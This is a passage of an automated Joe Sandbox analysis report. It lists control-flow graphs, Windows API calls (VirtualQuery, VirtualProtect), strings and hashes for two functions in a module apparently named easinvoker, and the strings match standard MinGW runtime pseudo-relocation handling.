                                                                                            control_flow_graph 140 613c16c0-613c16d9 141 613c16db-613c16e8 140->141 142 613c16f0-613c1747 call 613c23c0 call 613c2820 140->142 142->141 147 613c1749-613c174d 142->147 148 613c174f-613c1755 147->148 149 613c1775-613c177b 147->149 150 613c18a0-613c18a3 148->150 152 613c175b-613c1762 148->152 149->150 151 613c1781-613c1786 149->151 150->141 154 613c18a9-613c18b0 150->154 151->150 153 613c178c-613c1792 151->153 152->150 155 613c1768-613c176f 152->155 157 613c19ac-613c19d1 call 613c14e0 153->157 158 613c1798-613c179f 153->158 159 613c18b4-613c18d6 call 613c1550 154->159 155->153 156 613c1771 155->156 156->149 169 613c19f0-613c19f4 157->169 170 613c19d3-613c19ee 157->170 158->141 160 613c17a5-613c17b0 158->160 168 613c18d8 159->168 163 613c17ba-613c17cf 160->163 166 613c17d5 163->166 167 613c1916-613c1946 call 613c1550 163->167 171 613c18dd-613c18e0 166->171 172 613c17db-613c17de 166->172 178 613c194b-613c195a call 613c14e0 167->178 173 613c1814-613c1820 168->173 170->169 171->178 179 613c18e2-613c1911 call 613c1550 171->179 176 613c195f-613c1989 call 613c1550 172->176 177 613c17e4-613c17e7 172->177 173->141 180 613c1826-613c1838 173->180 193 613c198e-613c19a7 call 613c14e0 176->193 177->178 184 613c17ed-613c1812 call 613c1550 177->184 178->176 179->167 186 613c1853-613c1861 180->186 184->163 184->173 187 613c1840-613c184d 186->187 188 613c1863-613c1876 VirtualQuery 186->188 187->141 187->186 192 613c187c-613c1895 VirtualProtect 188->192 188->193 192->187 193->157
                                                                                            APIs
                                                                                            • VirtualQuery.KERNEL32(?,?,?,?,?,?,613C3014,?,?,?,?,613C12F5), ref: 613C1870
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,613C3014,?,?,?,?,613C12F5), ref: 613C1892
                                                                                            Strings
                                                                                            • Unknown pseudo relocation bit size %d., xrefs: 613C194B
                                                                                            • Unknown pseudo relocation protocol version %d., xrefs: 613C19AC
                                                                                            • VirtualQuery failed for %d bytes at address %p, xrefs: 613C1691, 613C1995
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                            • Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$ProtectQuery
                                                                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
                                                                                            • API String ID: 1027372294-974437099
                                                                                            • Opcode ID: ac37564a0943cd9c4829d9f00c113f258bab8429c18220a49573c59559e13634
                                                                                            • Instruction ID: d1b4ddb9884753ba9f060f2ad50529926f9c9f07c0d7013e73f46a45df094a5d
                                                                                            • Opcode Fuzzy Hash: ac37564a0943cd9c4829d9f00c113f258bab8429c18220a49573c59559e13634
                                                                                            • Instruction Fuzzy Hash: C471CD76B11A24C6EB01CB66E94078A7772B744FACF08C115CD1F27358DB3AC905E382
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 613C1550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 202 613c1550-613c157e 203 613c1582-613c15a9 202->203 205 613c15ab-613c15b9 call 613c2370 203->205 208 613c15bf-613c160f call 613c2490 VirtualQuery 205->208 209 613c16a2-613c16d9 call 613c14e0 205->209 214 613c1685-613c169d call 613c14e0 208->214 215 613c1611-613c161b 208->215 220 613c16db-613c16e8 209->220 221 613c16f0-613c1747 call 613c23c0 call 613c2820 209->221 214->209 217 613c161d-613c1623 215->217 218 613c1649-613c28b0 memcpy 215->218 217->218 221->220 227 613c1749-613c174d 221->227 228 613c174f-613c1755 227->228 229 613c1775-613c177b 227->229 230 613c18a0-613c18a3 228->230 232 613c175b-613c1762 228->232 229->230 231 613c1781-613c1786 229->231 230->220 234 613c18a9-613c18b0 230->234 231->230 233 613c178c-613c1792 231->233 232->230 235 613c1768-613c176f 232->235 237 613c19ac-613c19d1 call 613c14e0 233->237 238 613c1798-613c179f 233->238 239 613c18b4-613c18d6 call 613c1550 234->239 235->233 236 613c1771 235->236 236->229 249 613c19f0-613c19f4 237->249 250 613c19d3-613c19ee 237->250 238->220 240 613c17a5-613c17b0 238->240 248 613c18d8 239->248 243 613c17ba-613c17cf 240->243 246 613c17d5 243->246 247 613c1916-613c1946 call 613c1550 243->247 251 613c18dd-613c18e0 246->251 252 613c17db-613c17de 246->252 258 613c194b-613c195a call 613c14e0 247->258 253 613c1814-613c1820 248->253 250->249 251->258 259 613c18e2-613c1911 call 613c1550 251->259 256 613c195f-613c1989 call 613c1550 252->256 257 613c17e4-613c17e7 252->257 253->220 260 613c1826-613c1838 253->260 273 613c198e-613c19a7 call 613c14e0 256->273 257->258 264 613c17ed-613c1812 call 613c1550 257->264 258->256 259->247 266 613c1853-613c1861 260->266 264->243 264->253 267 613c1840-613c184d 266->267 268 613c1863-613c1876 VirtualQuery 266->268 267->220 267->266 272 613c187c-613c1895 VirtualProtect 268->272 268->273 272->267 273->237
                                                                                            APIs
                                                                                            Strings
                                                                                            • Address %p has no image-section, xrefs: 613C1557, 613C16A2
                                                                                            • VirtualQuery failed for %d bytes at address %p, xrefs: 613C1691
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                            • Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryVirtual
                                                                                            • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                            • API String ID: 1804819252-157664173
                                                                                            • Opcode ID: ceb095db029ccd83e1a4bc7a7c806a4770a528e67f66955d3a5e886fd59690f7
                                                                                            • Instruction ID: 1549435389f1d83eb98944755ae3b0791324c1eeac1aff2d4bd9f122e5cf5d3c
                                                                                            • Opcode Fuzzy Hash: ceb095db029ccd83e1a4bc7a7c806a4770a528e67f66955d3a5e886fd59690f7
                                                                                            • Instruction Fuzzy Hash: BD31EF77701A64D5EA119F16EC00B957B76B788FE8F0C8125EE1E17350DB39CA52C780
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%